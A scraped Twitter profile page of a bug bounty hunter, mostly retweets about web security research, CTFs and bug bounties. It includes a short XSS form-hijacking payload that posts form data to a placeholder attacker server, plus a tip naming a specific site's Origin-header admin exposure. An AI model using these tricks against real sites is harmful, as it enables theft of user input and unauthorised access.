Darkerhack

@Dark3rH4cK

BB Hunter, CTF Player, Fascinated About CyberSecurity. Aim for the Impossible 🚩

India
Vrijeme pridruživanja: siječanj 2017.

Tweetovi

Blokirali ste korisnika/cu @Dark3rH4cK

Jeste li sigurni da želite vidjeti te tweetove? Time nećete deblokirati korisnika/cu @Dark3rH4cK

  1. Prikvačeni tweet
    14. svi 2019.
    Poništi
  2. proslijedio/la je Tweet
    prije 6 sati

    on exploiting XXE vulnerability from different angles. I know you LOVE XXE, let me know if this video paves the way for new hunters to understand your interesting $7k bug!

    Poništi
  3. proslijedio/la je Tweet

    The DNS service is essential for browsing the 🌐 What about the vulnerabilities of this service? 🎯 I made an that presents an attack called DNS Poisoning. Follow for more about

    Poništi
  4. proslijedio/la je Tweet

    RCE story Forbidden 2.HTTP header in request - Login page access 3. Sqli queries tried no success 4. Some recon on gitlab - Found base64 pwd - decrypt 5. Accessed admin panel 6. Admin panel customized - CLI available 7. File read successful

    Poništi
  5. proslijedio/la je Tweet
    prije 10 sati

    Today, we are launching , a series of interviews with hunters. In our first edition, we are discussing logic flaws and with ! 🐸 Who would you like to see interviewed next? Leave a comment! 👇

    Poništi
  6. proslijedio/la je Tweet
    prije 19 sati

    My Hacking Channel is now LIVE! Check out my first video (the USB-C one) and get ready for much more! I will be putting my streaming archives here from now on. :)

    Prikaži ovu nit
    Poništi
  7. proslijedio/la je Tweet

    New Write-up on InfoSec Write-ups publication : "Exploiting HTTP Verbs"

    Poništi
  8. proslijedio/la je Tweet
    2. velj

    SQL Injection Payload List by Password Cracking Is Easy: Here’s How to Do It by in API Security Testing(Part 1) by Saumya Prakash Rana

    Poništi
  9. proslijedio/la je Tweet
    1. velj

    NEW BLOG POST ON RECON ON SHODAN PUBLISHED BY ME DO TAKE A READ AND SHARE 🙏

    Poništi
  10. proslijedio/la je Tweet
    1. velj

    Attention CTF players (and organizers, CTFd v2.0.0 - v2.2.2 has a serious vulnerability (CVE-2020-7245) in which an attacker could perform account takeover using a leading-trailing on the Registration form. It has been fixed in v2.2.3. Make sure to update!

    Prikaži ovu nit
    Poništi
  11. Poništi
  12. proslijedio/la je Tweet
    1. velj
    Poništi
  13. 31. sij
    Poništi
  14. proslijedio/la je Tweet

    2019 has been a record-breaking year on lots of fronts - thanks to you all! Keep up your awesome discoveries.

    Poništi
  15. Poništi
  16. proslijedio/la je Tweet
    30. sij
    Poništi
  17. proslijedio/la je Tweet
    30. sij

    Some hunters made over €50.000 in bug bounties with this simple trick. 🤑 Thanks for the , !

    Prikaži ovu nit
    Poništi
  18. 30. sij

    I strongly recommend this to new comers in Infosec 👍👍👍👌

    Poništi
  19. proslijedio/la je Tweet
    30. sij

    Multiple Vul in (*.blog.yelp.com) - Leakage user admin Sensitive Exposure *. - user-admin sensitive exposure *. - Admin-Page disclousure Add Param Origin in Req Header Origin http://127.0.0.1:8080

    Ovo je potencijalno osjetljiv multimedijski sadržaj. Saznajte više
    Poništi
  20. proslijedio/la je Tweet
    30. sij

    Web Application Penetration Testing Cheat Sheet Cross-site Request Forgery SQL injection Cross-site Scripting Offline Password Cracking Remote File Inclusion Local File Inclusion Open Redirection OS Command Injection XML External Entities Vul Scanning

    Poništi
  21. proslijedio/la je Tweet
    29. sij

    If you have a XSS in a <form> tag, close it and open a new form that you are controlling. Payload : "></form><form action="http://yourserver/> This is just a short payload for increasing the severity.

    Prikaži ovu nit
    Poništi

Čini se da učitavanje traje već neko vrijeme.

Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.

    Možda bi vam se svidjelo i ovo:

    ·